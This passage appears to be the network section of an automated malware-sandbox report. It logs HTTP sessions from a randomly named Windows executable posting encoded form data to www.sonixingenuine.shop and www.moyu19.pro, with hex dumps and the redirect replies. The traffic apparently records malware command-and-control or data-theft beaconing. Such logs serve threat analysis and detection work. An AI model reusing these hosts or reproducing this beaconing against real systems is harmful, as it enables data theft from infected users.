                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 50 6e 4a 45 34 47 6b 49 31 37 34 76 34 6a 63 66 75 63 31 7a 4b 74 74 39 38 42 58 39 53 68 42 54 58 6f 53 70 79 4f 4b 4e 33 64 4f 65 37 31 71 73 2f 71 74 72 4f 63 41 38 75 32 2f 6c 66 52 75 61 43 4b 38 64 78 77 58 56 48 64 6c 50 55 50 37 4e 65 63 51 36 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPnJE4GkI174v4jcfuc1zKtt98BX9ShBTXoSpyOKN3dOe71qs/qtrOcA8u2/lfRuaCK8dxwXVHdlPUP7NecQ6g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 13, 2025 09:41:37.999295950 CET923INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdiODRhZWItMjMyZS00YjM2LWJlZjUtNDJjYmZiN2RlZDdmIiwicGFnZV90aW1lIjoxNzM2NzU3Nj


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      41192.168.2.45004418.139.62.226805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:43.066718102 CET755OUTPOST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 78 73 42 5a 6e 4f 58 54 76 59 52 62 58 75 54 32 47 6b 54 53 65 68 4a 69 70 33 32 77 59 6f 6f 58 4e 38 36 69 4b 50 66 74 73 72 77 56 42 67 69 45 52 77 41 2b 4b 4c 44 64 48 2f 42 2f 31 53 75 48 45 64 6a 37 64 35 48 65 46 49 2f 75 77 64 2f 72 31 69 5a 57 70 76 73 78 77 43 72 77 34 54 44 65 6c 37 35 57 45 38 73 47 31 78 6e 56 31 57 30 67 69 75 47 39 74 76 53 67 39 7a 67 2f 54 53 41 57 55 35 38 4d 56 37 76 70 71 59 6c 30 58 2b 6f 65 33 50 57 4e 4e 33 57 33 2b 7a 39 42 75 64 63 73 72 65 72 79 32 76 76 4c 56 73 6f 4f 71 37 33 62 31 64 6f 46 67 3d 3d
                                                                      Data Ascii: 88v07=VRKAxCXV7CRWJxsBZnOXTvYRbXuT2GkTSehJip32wYooXN86iKPftsrwVBgiERwA+KLDdH/B/1SuHEdj7d5HeFI/uwd/r1iZWpvsxwCrw4TDel75WE8sG1xnV1W0giuG9tvSg9zg/TSAWU58MV7vpqYl0X+oe3PWNN3W3+z9Budcsrery2vvLVsoOq73b1doFg==
                                                                      Jan 13, 2025 09:41:43.993182898 CET370INHTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 08:41:43 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      42192.168.2.45004518.139.62.226805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:45.610457897 CET775OUTPOST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 53 30 42 43 45 57 58 55 50 59 65 55 33 75 54 39 6d 6b 58 53 66 64 4a 69 6f 7a 6d 77 74 59 6f 58 76 6b 36 6a 4f 54 66 73 73 72 77 4e 52 68 6f 41 52 77 65 2b 4b 47 38 64 43 48 42 2f 78 36 75 48 41 52 6a 36 75 68 47 52 31 49 39 6c 51 64 39 76 31 69 5a 57 70 76 73 78 30 72 4f 77 38 2f 44 65 56 4c 35 48 51 6f 76 4d 56 78 6f 53 31 57 30 33 79 75 43 39 74 76 30 67 2f 58 61 2f 51 6d 41 57 57 78 38 4d 6e 44 67 6e 71 5a 75 36 33 2f 63 59 48 71 6f 4e 6f 57 45 35 2f 6a 70 65 4d 52 36 70 74 54 78 6a 48 4f 34 5a 56 49 62 54 74 79 44 57 32 67 68 65 6f 55 77 6b 30 64 36 65 68 47 65 46 58 63 45 73 70 6f 76 50 56 4d 3d
                                                                      Data Ascii: 88v07=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtYoXvk6jOTfssrwNRhoARwe+KG8dCHB/x6uHARj6uhGR1I9lQd9v1iZWpvsx0rOw8/DeVL5HQovMVxoS1W03yuC9tv0g/Xa/QmAWWx8MnDgnqZu63/cYHqoNoWE5/jpeMR6ptTxjHO4ZVIbTtyDW2gheoUwk0d6ehGeFXcEspovPVM=
                                                                      Jan 13, 2025 09:41:46.561048031 CET370INHTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 08:41:46 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      43192.168.2.45004618.139.62.226805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:48.165729046 CET10857OUTPOST /01c7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.sonixingenuine.shop
                                                                      Origin: http://www.sonixingenuine.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.sonixingenuine.shop/01c7/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 53 30 42 43 45 57 58 55 50 59 65 55 33 75 54 39 6d 6b 58 53 66 64 4a 69 6f 7a 6d 77 74 51 6f 57 61 77 36 73 4a 6e 66 76 73 72 77 54 42 68 6c 41 52 78 43 2b 4b 65 34 64 43 43 32 2f 7a 43 75 49 44 5a 6a 7a 2f 68 47 47 46 49 39 71 77 64 2b 72 31 69 32 57 70 66 6f 78 77 50 4f 77 38 2f 44 65 58 6a 35 58 30 38 76 4b 56 78 6e 56 31 57 6f 67 69 75 36 39 70 44 4b 67 2f 44 4b 34 6a 2b 41 57 32 68 38 4f 79 58 67 72 71 5a 73 39 33 2f 45 59 48 57 4e 4e 73 2b 32 35 2f 58 44 65 4f 4e 36 6f 62 36 6f 33 32 4f 6e 4c 6a 45 66 4d 4f 61 38 50 31 41 63 54 70 51 52 6f 6d 68 46 43 43 58 31 41 30 35 64 34 49 46 76 4d 79 34 7a 64 45 50 4c 36 66 62 44 78 6b 71 51 57 6f 76 4d 37 34 6c 50 6c 36 4b 2b 6a 61 41 57 35 44 71 66 68 66 73 32 74 46 34 66 72 30 5a 68 5a 41 66 47 4c 63 52 36 2b 63 79 71 68 56 70 46 76 76 51 68 6c 36 36 36 59 4b 36 59 51 72 54 35 41 4d 4f 77 62 43 6f 79 34 35 46 78 5a 4b 6a 48 64 31 38 47 53 58 78 7a 4e 6d 30 44 7a 48 5a 34 55 61 70 59 4c 46 78 34 [TRUNCATED]
                                                                      Data Ascii: 88v07=VRKAxCXV7CRWJS0BCEWXUPYeU3uT9mkXSfdJiozmwtQoWaw6sJnfvsrwTBhlARxC+Ke4dCC2/zCuIDZjz/hGGFI9qwd+r1i2WpfoxwPOw8/DeXj5X08vKVxnV1Wogiu69pDKg/DK4j+AW2h8OyXgrqZs93/EYHWNNs+25/XDeON6ob6o32OnLjEfMOa8P1AcTpQRomhFCCX1A05d4IFvMy4zdEPL6fbDxkqQWovM74lPl6K+jaAW5Dqfhfs2tF4fr0ZhZAfGLcR6+cyqhVpFvvQhl666YK6YQrT5AMOwbCoy45FxZKjHd18GSXxzNm0DzHZ4UapYLFx4oAHxZqMxvYJz4fT5sKHrqkkZba4ZFLWdW5ZV1AQUs1qrJylU3tAJuULtdkyCV5zCI9mZQqOjndso64pCqMFXRLfJrL3Pd9ZAVeiwtJ85I2nQQfdy3iflW/z6R1x5IXtRN+sBigCein5mnZmcF+s9b47cffpB0GWc76YzGCzWVbR1KFsLgiik66fSTF4eXimAE4KzJx8RPgkVSzdpKWuNoJVfXqSsFsoTqWJ9uASQwOsiJISycLHQPwfHeNl68hLc6pQphVONoT2cZG+glH1dxCb45q5EyG9H8rLO/29T2OV24dTnRYOzKn5kcn4iPBpMjAiFzRglOwwjr6/yMrGPq6DOljTtrrsNd12N1cQUDf06e3XqXaEM4t234KwflPlzCbBZs7ukL8ggiDx08xG9bhsAt4tgJxuHpWPV3q6HNvh2uQsVTPfR2DaHXlOduAng4YnUmD0YRV/ZZiSHmw2zPJjwvGaR8bFHTAPsKTyqGORyLPLc4UcBJbQZxRiFkfAgXdQFcQRdJtZDuRHXqN08aKYmRQ1pGBmjvCVGvktcKNBbXRt+0uh3LjdTGQhWz6VvvgejnWPRwG9Y6+M5z68CUc5aUNVzEgoLt7ArRcpEmTl+WI01WIlNnXKNPXZOPx7eTLLPMu3EUb2BxvDcVz+xA9Foh3wzUug9dw [TRUNCATED]
                                                                      Jan 13, 2025 09:41:49.084079981 CET370INHTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 08:41:48 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      44192.168.2.45004718.139.62.226805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:50.714548111 CET473OUTGET /01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.sonixingenuine.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:41:51.670768976 CET506INHTTP/1.1 301 Moved Permanently
                                                                      Server: openresty
                                                                      Date: Mon, 13 Jan 2025 08:41:51 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 166
                                                                      Connection: close
                                                                      Location: https://www.sonixingenuine.shop/01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      45192.168.2.450048154.39.239.237805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:57.202934027 CET728OUTPOST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6c 39 7a 43 6d 64 68 6e 48 69 4c 4f 38 51 6b 68 43 71 38 4f 34 5a 49 4a 75 78 48 39 56 30 32 48 67 65 31 39 51 47 45 44 43 62 46 43 30 64 57 33 33 5a 50 49 6e 6e 74 39 65 65 42 43 34 42 35 75 5a 4f 79 53 78 39 46 70 57 75 41 4a 30 76 55 78 30 2b 79 43 79 31 52 2b 56 53 68 4a 59 44 67 77 70 33 73 34 71 38 4e 50 6a 6a 49 7a 30 4e 62 36 65 31 7a 2f 70 61 41 7a 57 7a 34 39 59 75 6d 34 73 37 72 71 32 44 5a 70 2f 72 41 63 44 55 63 50 41 42 63 42 7a 4b 4e 46 72 36 2b 56 38 70 77 30 57 4b 53 6f 57 4b 79 57 79 65 41 49 56 39 51 6a 46 52 2b 51 31 77 3d 3d
                                                                      Data Ascii: 88v07=HViGmqVHHzTzl9zCmdhnHiLO8QkhCq8O4ZIJuxH9V02Hge19QGEDCbFC0dW33ZPInnt9eeBC4B5uZOySx9FpWuAJ0vUx0+yCy1R+VShJYDgwp3s4q8NPjjIz0Nb6e1z/paAzWz49Yum4s7rq2DZp/rAcDUcPABcBzKNFr6+V8pw0WKSoWKyWyeAIV9QjFR+Q1w==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      46192.168.2.450049154.39.239.237805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:41:59.749032974 CET748OUTPOST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6a 74 44 43 6b 2b 35 6e 46 43 4b 38 35 51 6b 68 5a 36 38 4b 34 5a 45 4a 75 30 6e 74 56 6d 43 48 67 2f 46 39 43 55 67 44 48 62 46 43 2f 39 57 79 34 35 4f 47 6e 6e 78 31 65 63 56 43 34 42 74 75 5a 4c 4f 53 77 4d 46 71 56 65 41 78 38 50 55 7a 36 65 79 43 79 31 52 2b 56 53 63 73 59 44 6f 77 70 47 63 34 37 75 31 4d 38 54 49 30 67 64 62 36 61 31 7a 6a 70 61 41 46 57 33 34 58 59 74 4f 34 73 37 37 71 33 53 5a 6d 32 72 41 61 65 6b 63 52 50 6a 39 4a 36 70 77 45 75 4d 69 4b 32 59 77 73 65 73 66 79 48 37 54 42 67 65 6b 37 49 36 5a 58 49 53 44 5a 75 37 4b 78 71 67 48 67 53 4d 7a 31 30 4a 70 48 59 32 44 4f 33 4a 6b 3d
                                                                      Data Ascii: 88v07=HViGmqVHHzTzjtDCk+5nFCK85QkhZ68K4ZEJu0ntVmCHg/F9CUgDHbFC/9Wy45OGnnx1ecVC4BtuZLOSwMFqVeAx8PUz6eyCy1R+VScsYDowpGc47u1M8TI0gdb6a1zjpaAFW34XYtO4s77q3SZm2rAaekcRPj9J6pwEuMiK2YwsesfyH7TBgek7I6ZXISDZu7KxqgHgSMz10JpHY2DO3Jk=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      47192.168.2.450050154.39.239.237805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:42:02.311662912 CET10830OUTPOST /b9e2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.moyu19.pro
                                                                      Origin: http://www.moyu19.pro
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.moyu19.pro/b9e2/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 48 56 69 47 6d 71 56 48 48 7a 54 7a 6a 74 44 43 6b 2b 35 6e 46 43 4b 38 35 51 6b 68 5a 36 38 4b 34 5a 45 4a 75 30 6e 74 56 6d 61 48 67 4e 4e 39 51 6b 63 44 41 62 46 43 6b 64 57 7a 34 35 50 61 6e 6e 35 50 65 63 5a 34 34 43 56 75 57 4a 32 53 68 49 52 71 43 4f 41 78 2b 50 55 79 30 2b 79 54 79 30 67 35 56 53 73 73 59 44 6f 77 70 46 30 34 37 38 4e 4d 36 54 49 7a 30 4e 61 75 65 31 7a 66 70 61 34 37 57 33 73 74 5a 64 75 34 73 61 4c 71 31 6b 4e 6d 75 37 41 59 64 6b 64 43 50 6a 78 47 36 70 38 79 75 4d 2b 73 32 59 45 73 63 5a 69 4e 44 4c 48 4c 79 2f 45 71 57 4a 78 49 50 52 2f 75 31 36 66 4b 6a 67 2f 6a 4e 4d 6e 47 2f 75 4a 4b 42 31 61 4d 73 4d 54 46 4a 67 71 49 4b 69 6e 58 76 49 66 6f 4c 51 59 6c 53 6a 35 5a 4d 53 53 4a 58 2f 6e 44 31 57 73 78 66 6d 74 55 48 77 35 43 2f 5a 63 71 42 4f 4a 54 38 6a 62 65 68 51 72 48 48 2f 6a 57 66 64 66 68 65 78 36 55 78 41 2b 37 6a 31 4a 66 2b 77 6d 6c 70 49 69 69 58 66 6b 4f 6f 42 4e 6a 53 56 79 4e 67 55 6d 48 34 36 65 51 52 2f 63 4f 69 6b 56 41 4a 63 71 69 [TRUNCATED]
                                                                      Data Ascii: 88v07=HViGmqVHHzTzjtDCk+5nFCK85QkhZ68K4ZEJu0ntVmaHgNN9QkcDAbFCkdWz45Pann5PecZ44CVuWJ2ShIRqCOAx+PUy0+yTy0g5VSssYDowpF0478NM6TIz0Naue1zfpa47W3stZdu4saLq1kNmu7AYdkdCPjxG6p8yuM+s2YEscZiNDLHLy/EqWJxIPR/u16fKjg/jNMnG/uJKB1aMsMTFJgqIKinXvIfoLQYlSj5ZMSSJX/nD1WsxfmtUHw5C/ZcqBOJT8jbehQrHH/jWfdfhex6UxA+7j1Jf+wmlpIiiXfkOoBNjSVyNgUmH46eQR/cOikVAJcqitutH9eqg3Sk30t6rvaIr8EDYHwMRu7K2bBDT6H3RQfbdLIkeKYAqeAYlT+9XEcKrzl1N3RNydwWCTOC6D2KYvHcVkOqsu50aKVeGHXzKDq/F4+CMzL9Mi2P4HHJhFvZgTA9BnCebOmQkZEMUCHRBh3aKJ23o6W7I9NI7S0YUOnejJgBiTnnxboiGHqMimBr9SlU7VW6cR/bC7GR4X9zu8syXTLhuG7wyeREEtnG3TSJWsbGkvPhVEKalMYTkvV+9IPmdgRhu1UIh4cGtEonZc/cQABGHTC9Gojwm4GK3yDrRP5P+wPh/okwWJOxS3PeYQYM73+gLMt+ewfCZp+TSYTPoH7iwszcJhn3bUFJaq8MzP7uV1ZJJwdq3FBs3dl9/h6ihtPLKMFNItxfl9Ez7hiJaYLFsPCz8HUz3rP5Lv4ZDeWCR2aQ3w4sdkGw+O4OnoPX9Gqlhq/FJUn89qYZOKs5sVW/GwSFW1PhT+m1ooyODixfLZ5kahpPWKb2nt5syB3rE95t/WyfoK3rdBEJ9qJB/x+Gk9qpy1KoeZ+2t7ey9hLSGwN3zXP3iKtvpZ4hzdrsku6aXSH5BsvVFlPoqgEjBVV5QpUdQDdzmVUgtWvCiZsx3/wKAVhGJdqtTp9GPC3CEEG7Hh2x94QM6S/8J9VMzVQOU3DKPuQ [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      48192.168.2.450051154.39.239.237805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:42:04.856554031 CET464OUTGET /b9e2/?88v07=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.moyu19.pro
